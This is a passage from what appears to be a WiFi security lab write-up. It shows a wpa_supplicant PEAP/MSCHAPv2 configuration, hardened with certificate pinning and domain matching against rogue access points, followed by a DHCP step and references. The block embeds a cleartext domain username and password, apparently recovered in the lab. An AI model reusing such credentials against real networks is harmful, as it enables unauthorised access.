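    ssid="wifi-corp"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    # Outer identity sent in cleartext; keeps the real username out of the
    # unprotected EAP-Identity exchange that a rogue AP sees first.
    anonymous_identity="anonymous"
    identity="CONTOSO\juan.tr"
    password="bulldogs1234"
    # Assumed path. Only certificates chaining to this CA are accepted; a rogue
    # server that merely copies the real Issuer/Subject fields does not chain.
    ca_cert="/etc/ssl/certs/wifichallenge-ca.pem"
    # Assumed host-name suffix. The server certificate's dNSName (or CN fallback)
    # must end in it, so a certificate with CN "WiFiChallenge CA" is rejected.
    domain_suffix_match="wifichallenge.com"
    # peaplabel=0 as on the page; additionally refuse legacy TLS versions.
    phase1="peaplabel=0 tls_disable_tlsv1_0=1 tls_disable_tlsv1_1=1"
    phase2="auth=MSCHAPV2"
}
```

With this block the TLS tunnel is torn down before the inner MSCHAPv2 exchange, so no challenge/response pair is ever sent to an untrusted server.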
## Get an IP address

Renew the DHCP lease to obtain an IP address.

```
dhclient -v wlan0
```

## References
https://pierrelouis.blog/posts/oswp-lab-setup/
https://zeyadazima.com/notes/oswplaybook/#attacking-wpa-enterprise
https://lab.wifichallenge.com/